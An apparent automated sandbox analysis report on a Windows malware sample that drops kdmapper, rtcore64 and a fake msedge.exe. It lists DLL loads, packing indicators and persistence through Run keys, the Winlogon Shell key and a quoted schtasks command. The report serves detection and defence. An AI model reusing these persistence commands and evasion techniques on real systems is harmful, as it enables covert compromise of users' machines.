Source: C:\Windows\Speech\kdmapper.exe	Section loaded: slc.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: userenv.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sppc.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: pcacli.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: mscoree.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: apphelp.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: version.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: wldp.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: amsi.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: userenv.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: profapi.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: msasn1.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: gpapi.dll
Source: C:\Windows\Speech\rtcore64.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: UY9hUZn4CQ.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: UY9hUZn4CQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UY9hUZn4CQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UY9hUZn4CQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UY9hUZn4CQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UY9hUZn4CQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UY9hUZn4CQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: UY9hUZn4CQ.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: UY9hUZn4CQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Calc\Builds\922AVUSVRZEXKB\x64\Release\Loader.pdb,, source: imxyvi.exe, 0000001C.00000000.1350848208.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe, 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe.21.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000034.00000002.1496031187.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp, kdmapper.exe, 00000034.00000000.1468077403.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp, kdmapper.exe, 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe.41.dr
Source:	Binary string: C:\Calc\Builds\922AVUSVRZEXKB\x64\Release\Loader.pdb source: imxyvi.exe, 0000001C.00000000.1350848208.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe, 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe.21.dr
Source:	Binary string: C:\Users\Administrator\Desktop\ENIGMA PERM\Build\ENIGMA SOLUTIONS PERM.pdb source: UY9hUZn4CQ.exe
Source:	Binary string: C:\Users\Administrator\Desktop\ENIGMA PERM\Build\ENIGMA SOLUTIONS PERM.pdb** source: UY9hUZn4CQ.exe
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.pdb source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.pdb source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 0000001F.00000003.1395098552.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394889249.000001EC88A03000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394980774.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394889249.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394980774.000001EC88A03000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395278508.000001EC889C0000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.31.dr

Source: UY9hUZn4CQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: UY9hUZn4CQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: UY9hUZn4CQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: UY9hUZn4CQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: UY9hUZn4CQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Windows\Speech\rtcore64.exe

Unpacked PE file: 65.2.rtcore64.exe.730000.0.unpack ZhxHw+:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: C:\Windows\Speech\kdmapper.exe

File created: C:\Edge\__tmp_rar_sfx_access_check_4230218

Source: kdmapper.exe.41.dr	Static PE information: section name: .didat
Source: rtcore64.exe.55.dr	Static PE information: section name: ZhxHw+
Source: rtcore64.exe.55.dr	Static PE information: section name:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00440905 push ecx; retf	47_2_00440906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 47_2_00452DD9 push eax; retf	47_2_004534E2
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EDF640 push ecx; ret	52_2_00EDF653
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EDEB78 push eax; ret	52_2_00EDEB96
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_0077A52F push ss; retf	65_2_0077A530
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D079561 push ecx; ret	65_2_6D079574

Source: physmeme.exe.31.dr	Static PE information: section name: .text entropy: 7.9965850430662675
Source: msedge.exe.52.dr	Static PE information: section name: .text entropy: 7.556050087022216
Source: rtcore64.exe.55.dr	Static PE information: section name: ZhxHw+ entropy: 7.999404962177661
Source: winlogon.exe.161.dr	Static PE information: section name: .text entropy: 7.556050087022216

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Executable created and started: C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Executable created and started: C:\Windows\Speech\rtcore64.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Executable created and started: C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Executable created and started: C:\Windows\Speech\imxyvi.exe	Jump to behavior

Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\MQshNARH.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\ITDiARjW.log	Jump to dropped file
Source: C:\Windows\Speech\kdmapper.exe	File created: C:\Edge\msedge.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\rtcore64.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\AppData\Local\winlogon.exe	Jump to dropped file
Source: C:\Windows\Speech\rtcore64.exe	File created: C:\Users\user\AppData\Roaming\msvcp110.dll	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\oLoCRyrD.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\QGjYUwSA.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\imxyvi.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\XEXXxLMp.log	Jump to dropped file

Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\rtcore64.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\imxyvi.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file

Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\ITDiARjW.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\QGjYUwSA.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\oLoCRyrD.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\XEXXxLMp.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\MQshNARH.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates multiple autostart registry keys

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
